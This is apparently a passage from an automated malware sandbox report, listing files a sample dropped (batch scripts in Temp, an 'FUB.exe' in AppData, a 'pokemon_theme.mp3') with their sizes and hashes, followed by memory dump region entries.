                                                          Filesize

                                                          944B

                                                          MD5

                                                          6d3e9c29fe44e90aae6ed30ccf799ca8

                                                          SHA1

                                                          c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                          SHA256

                                                          2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                          SHA512

                                                          60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          69da25427e96ff32dbf446fece127bbb

                                                          SHA1

                                                          e4047145ae5a14eabf0abdb43c4f852fc89157ff

                                                          SHA256

                                                          b8093fc0a2221df8a27ae059bf9e222ba57e341da82ad93c05012c4ebc4b5825

                                                          SHA512

                                                          1ff1b2f7baca1051a2cbac6b5565e303f97ef2e92b360d10d76f4c501d2aef9bc3e9b1effdaf5387c2f291698dedc281235d3dd5948003d2b29a0f921eeea497

                                                        • C:\Users\Admin\AppData\Local\Temp\1F1C.tmp\1F1D.tmp\1F1E.bat

                                                          Filesize

                                                          863B

                                                          MD5

                                                          f7323ebef3f8ebdf48b58f943c6e4be0

                                                          SHA1

                                                          11876486fd95681fcc2f83a65525c2b7ef94c4fa

                                                          SHA256

                                                          2906869b65545045b1e715cd34a57f4b211782a3d96dea138ca882d6ede1aaef

                                                          SHA512

                                                          a3cd247b20616ab505b504fe3f606239c521f296c524043412888e3049f43af97317f9f36397577fe335e4a0f06a9f26c64a37c7a80025398ae7308557181854

                                                        • C:\Users\Admin\AppData\Local\Temp\22E5.tmp\22E6.tmp\22E7.bat

                                                          Filesize

                                                          180B

                                                          MD5

                                                          d15a01050dcffc62c13d0a28957ca0e7

                                                          SHA1

                                                          31398e8808dad6bf85fbccebcc9cc31bb5818133

                                                          SHA256

                                                          361497a9c384478b5cab096288a0217af22c6f1671f614aab5ae515f10c8e7d2

                                                          SHA512

                                                          2685e23653c5cf74904bcca6fda138d51671801da523c843270f7228eb0f2397ca4e70c9bf7bf3f828477ab392a3e6905d19346293539bc93a79cd89b1c3b792

                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ubqmeqw.f1m.ps1

                                                          Filesize

                                                          60B

                                                          MD5

                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                          SHA1

                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                          SHA256

                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                          SHA512

                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                        • C:\Users\Admin\AppData\Local\Temp\pokemon_theme.mp3

                                                          Filesize

                                                          2.4MB

                                                          MD5

                                                          060b0ab56aa114cbc30969a507f2009a

                                                          SHA1

                                                          69e69eedaed0109e5c96e70635e2a9b3cf2c816d

                                                          SHA256

                                                          03cb94f9ca52e4e10b5308b7f791b8e9b852576e254c3866aaaa244882afa5bc

                                                          SHA512

                                                          f4c09ca075c8369e80a4c3f65300f57b09460b9527b3e3a29b0492fc4a8bd23dbce499a289daf27cd9be14283bc05fa07401da57810644d6451b645d9d093a76

                                                        • C:\Users\Admin\AppData\Roaming\FUB.exe

                                                          Filesize

                                                          120KB

                                                          MD5

                                                          1f3710f2cca204a16739b24e38717727

                                                          SHA1

                                                          16010ba78ec0fb240bf5b3bf5fa2292757ecd4bf

                                                          SHA256

                                                          46c5ee9e40796227487c1c57c20de42766e84967784560c4dc985101e8c45e5b

                                                          SHA512

                                                          3a892b5450594a633195631e1fa48d7b69c88523c9e7d933c75a6876b1c281352176f93ba5d2d65a84a347f7cefb65bca82b06ffb3e7319bb6255ef878b2af74

                                                        • memory/2672-98-0x0000024FA3570000-0x0000024FA3592000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/3992-153-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-156-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-145-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-146-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-155-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-144-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-154-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-151-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-152-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3992-150-0x000001828AEC0000-0x000001828AEC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-253-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-252-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-259-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-264-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-263-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-262-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-261-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-260-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4032-254-0x0000013FCCBA0000-0x0000013FCCBA1000-memory.dmp

                                                          Filesize

                                                          4KB